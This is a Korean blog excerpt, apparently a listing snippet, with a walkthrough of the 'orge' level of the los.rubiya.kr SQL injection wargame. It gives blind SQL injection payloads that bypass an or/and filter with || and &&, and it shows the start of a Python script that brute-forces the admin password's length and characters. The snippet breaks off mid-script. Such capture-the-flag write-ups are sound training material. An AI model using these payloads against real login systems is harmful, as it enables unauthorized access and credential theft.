los 7번1 [los.rubiya.kr] orge #7 [orge] 문제를 보니 preg_match함수에 의해 or과 and를 사용할 수없으므로 ||와 &&로 우회를 해줘야 한다.그리고 다른 별다른 필터링이 없으므로 length와 substr을 이용하여 비밀번호를 구할수 있을것 같다.?pw=' || id='admin' && length(pw)='숫자 를 이용하여 길이를 구하고?pw=' || id='admin' && substr(pw,1,1)='문자 를 이용하여 패스워드를 구하면 된다. import requests for admin_len in range(99) : URL='http://los.rubiya.kr/orge_bad2f25db233a7542be75844e314e9f3.php' query={'pw': '\' || id=\'admin\' && lengt.. 2018. 8. 25. 이전 1 다음
